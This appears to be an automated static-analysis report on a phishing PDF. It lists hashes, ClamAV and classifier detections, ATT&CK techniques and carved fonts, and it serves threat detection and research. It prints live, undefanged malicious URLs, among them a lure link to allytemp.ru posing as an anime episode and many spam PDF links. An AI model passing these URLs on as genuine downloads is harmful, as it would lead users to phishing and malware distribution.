Malicious PDF — malware analysis report

Static analysis result for SHA-256 d15544570e8207bd…

MALICIOUS

PDF

172.5 KB Created: 2021-06-09 07:28:28 +03:00 Authoring application: wkhtmltopdf 0.12.5 (via Qt 4.8.7) First seen: 2021-09-27
MD5: 278dab9c81274bde58599752c955f126 SHA-1: cc47b0d1b85a969d308a1d03919c9a2da5a00608 SHA-256: d15544570e8207bd8c899e5b6a098f9b17a696ccc499685a37f1aba75bda8e78
104 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.007 JavaScript

The file is a PDF document that contains an embedded URL disguised as a link to an anime episode. The ML classifier and ClamAV detection strongly indicate malicious intent, likely phishing or malware distribution. The presence of an external URI points to the download of a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9984

Heuristics 5

  • ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • External URI info PDF_URI
    PDF contains an external URL action
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://allytemp.ru/pbw?utm_term=sword+art+online+alicization+war+of+underworld+episode+14+english+sub PDF link annotation
    • https://wedemewimobuxet.weebly.com/uploads/1/3/4/3/134309086/wetedejipofutuwu.pdfIn PDF document text
    • https://static.s123-cdn-static.com/uploads/4452386/normal_5ff977b6b4c8f.pdfIn PDF document text
    • https://static.s123-cdn-static.com/uploads/4414515/normal_5ff9bb9e2e4c5.pdfIn PDF document text
    • https://static.s123-cdn-static.com/uploads/4456712/normal_5fccdfced995e.pdfIn PDF document text
    • https://static.s123-cdn-static.com/uploads/4490141/normal_5fc8dea5a874e.pdfIn PDF document text
    • https://cdn-cms.f-static.net/uploads/4368222/normal_6024cd7b33779.pdfIn PDF document text
    • https://cdn-cms.f-static.net/uploads/4378161/normal_600e71136dcfc.pdfIn PDF document text
    • https://cdn-cms.f-static.net/uploads/4412575/normal_60b88b10b33aa.pdfIn PDF document text
    • https://bomawivipevesuw.weebly.com/uploads/1/3/4/8/134852605/tugadejajipoduk.pdfIn PDF document text
    • https://wetugaremuzen.weebly.com/uploads/1/3/5/2/135298520/aa9d33e5.pdfIn PDF document text
    • https://static.s123-cdn-static.com/uploads/4420597/normal_6000bfe3c8761.pdfIn PDF document text
    • http://www.ascendercorp.com/In PDF document text
    • http://www.ascendercorp.com/typedesigners.htmlIn PDF document text
    • http://www.daltonmaag.com/In PDF document text
    • http://vimadutukad.pbworks.com/w/file/fetch/144904953/zubupujixowigum.pdfIn PDF document text
    • https://uploads.strikinglycdn.com/files/0384cfc0-a9d5-4a62-a35a-56a180211229/forward_start_option_pricing.pdfIn PDF document text
    • http://bukafag.pbworks.com/f/16740275775.pdfIn PDF document text
    • https://uploads.strikinglycdn.com/files/cec1d892-eabc-43c1-b124-898dc3a6da95/stam_sorc_leveling_build_eso.pdfIn PDF document text
    • https://uploads.strikinglycdn.com/files/8a908f86-f4be-4b73-80d2-c9d11c145284/creative_writing_projects_middle_school.pdfIn PDF document text
    • https://uploads.strikinglycdn.com/files/9e42e805-3bcb-40b5-b2b9-d9e42f0dd702/nordictrack_c900_pro_for_sale.pdfIn PDF document text
    • https://uploads.strikinglycdn.com/files/950ee5fd-01ea-4eaf-9615-4bfaa05f446d/jubimivexubavegekalaf.pdfIn PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/xap/1.0/rights/In PDF document text
    • http://scripts.sil.org/OFLIn PDF document text

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
font_00_sfnt_off0001d132.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1D132 44792 bytes
SHA-256: 127a9c9a06f4d4d956de5172cd70881097caf93b9dad019be01a2c7ff52f6db9
font_01_sfnt_off00025a31.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x25A31 5824 bytes
SHA-256: 3acc46aafbf9734885c829461ba542253525c181f7ea060b2bf8ccf9ca599f31
font_02_sfnt_off00026e12.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x26E12 11804 bytes
SHA-256: 3972a91ade3172cd1b43b55f70ba393402d1611789a329598186386496ac7475
font_03_sfnt_off000294c2.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x294C2 4324 bytes
SHA-256: 1158d95dac44631f497756703988ba3645251422e7ff0015d3fca430225e7c3e